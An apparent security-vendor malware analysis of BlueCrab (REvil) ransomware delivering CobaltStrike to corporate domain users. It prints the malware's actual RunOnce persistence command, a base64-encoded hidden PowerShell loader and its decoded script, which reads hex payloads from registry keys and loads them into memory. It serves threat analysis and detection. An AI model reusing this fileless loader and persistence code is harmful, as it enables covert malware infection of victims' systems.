BlueCrab Ransomware Installing Hacking Tool CobaltStrike in Corporate Environments

The ASEC analysis team confirmed that during the BlueCrab ransomware (=Sodinokibi, REvil) infection process, which is distributed in JS form, the CobaltStrike hacking tool was distributed under certain conditions. CobaltStrike hacking tool is a limited tool used for mock hacking test purposes under legitimate purposes; however, it has been actively used in malware since the recent source code leak. Since recently confirmed BlueCrab ransomware distribution JS file checks the corporate Active Directory (AD) environment and installs the CobaltStrike hacking tool instead of ransomware if the target is a corporate user, users must stay vigilant to prevent such from happening.

The BlueCrab ransomware is a ransomware that is distributed via JS files downloaded through fake forum pages. Several articles regarding this ransomware and the issue were posted before.

When JS file accesses C2, it checks the existence of user system’s %USERDNSDOMAIN% environment variable.

Checking for %USERDNSDOMAIN% environment variable

If there is a %USERDNSDOMAIN% environment variable, the value (“278146”) gets added to the argument and performs a request. It has been confirmed that the responses by C2 differed depending on the presence of this value. In the past, BlueCrab ransomware was downloaded even in the said condition, but now, CobaltStrike gets downloaded instead. The environment variable does not exist in a regular user environment. This environment variable exists in environments with set domain (such as corporate AD server), resulting to infection by CobaltStrike.

The flow of the infection is similar to the previous BlueCrab distribution, JS → PowerShell → .NET Injector → Delphi Loader, but the details of each stage differ from BlueCrab distribution. For more information about the previous BlueCrab distribution, please refer to the blog links above.

In the payload that distributes CobaltStrike, the .NET Injector section was divided into two parts. For easier explanation, the 1st .NET PE will be referred to “Loader” and the 2nd .NET PE will be referred to “Injector.” The .Net Loader binary is injected to the “\HKEY_CURRENT_USER\Software\[Username]+’1′” key, and the .NET Injector binary is injected to the “\HKEY_CURRENT_USER\Software\[Username]” key.

The powershell command that runs later reads the [Username] key to run the Loader, and when the Loader runs, reads the [Username]+’1′ key to run the Injector.

Loader Binary
Injector Binary

Upon running the Loader, the following powershell command gets registered to the autorun registry.

  • Path: Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\
  • Data: powershell -Win Hi -Command “$r = [Environment]::GetEnvironmentVariable(‘K’, ‘User’).split();$p=$r[0];$r[0]=”;Start-Process $p -ArgumentList ($r -join ‘ ‘) -Win Hi”

The following command gets registered to the environment variable.

Path: Computer\HKEY_CURRENT_USER\Environment\K
Original Data: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -En “PAAjACAAZQBiAGgAegBvAG8AaQAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= “
  • Data Decoding:
    <# ebhzooi #>$u=$env:UserName;for ($i=0;$i -le 700;$i++){$c=”HKCU:\SOFTWARE\”+$u+”1″;Try{$a=$a+(Get-ItemProperty -path $c).$i}Catch{}};function chba{[cmdletbinding()]param([parameter(Mandatory=$true)][String]$hs);$Bytes = [byte[]]::new($hs.Length / 2);for($i=0; $i -lt $hs.Length; $i+=2){$Bytes[$i/2] = [convert]::ToByte($hs.Substring($i, 2), 16)}$Bytes};$i = 0;While ($True){$i++;$ko = [math]::Sqrt($i);if ($ko -eq 1000){ break}}[byte[]]$b = chba($a.replace(“#”,$ko));[Reflection.Assembly]::Load($b);[Mode]::Setup();

Even if the PC reboots by the action of registering registry, the powershell command that performs the same behavior is run. Afterward, the Loader reads the Injector binary from the [Username] key, load it to the memory, and run it. The Injector then runs the “C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe” process, and injects the Delphi Loader binary.

.NET Loader Code (1)
.NET Loader Code (2)

The Delphi Loader that started running by the process shown above runs the internal CobaltStrike Beacon binary. The CobaltStrike Beacon settings used in this process are as follows:

CobaltStrike Beacon Settings

The attacker distributes ransomware to ordinary individual users, and CobaltStrike for additional attacks to users in corporate environments such as AD servers. Corporate environments with set domain such as AD servers must take extra caution. Users must refrain from running suspicious-looking files, and for file downloads, it is recommended for users to download files from official source websites.

AhnLab’s anti-malware product V3 detects the fileless attacks without any specific signature using the behavior detections below.

[Behavior Detection]

  • Malware/MDP.Inject.M3044
  • Malware/MDP.Behavior.M3491

[IOC Info]

5 3 votes
Article Rating
Subscribe
Notify of
guest

3 Comments
Inline Feedbacks
View all comments
trackback

[…] Delphi loader is not novel, BlackCat joins other ransomware groups, including REvil/Sodinokibi that have been reported leveraging the Delphi loader to run a Cobalt Strike […]

trackback

[…] Delphi loader is not novel, BlackCat joins other ransomware groups, including REvil/Sodinokibi that have been reported leveraging the Delphi loader to run a Cobalt Strike […]

trackback

[…] Delphi loader is not novel, BlackCat joins other ransomware groups, including REvil/Sodinokibi that have been reported leveraging the Delphi loader to run a Cobalt Strike […]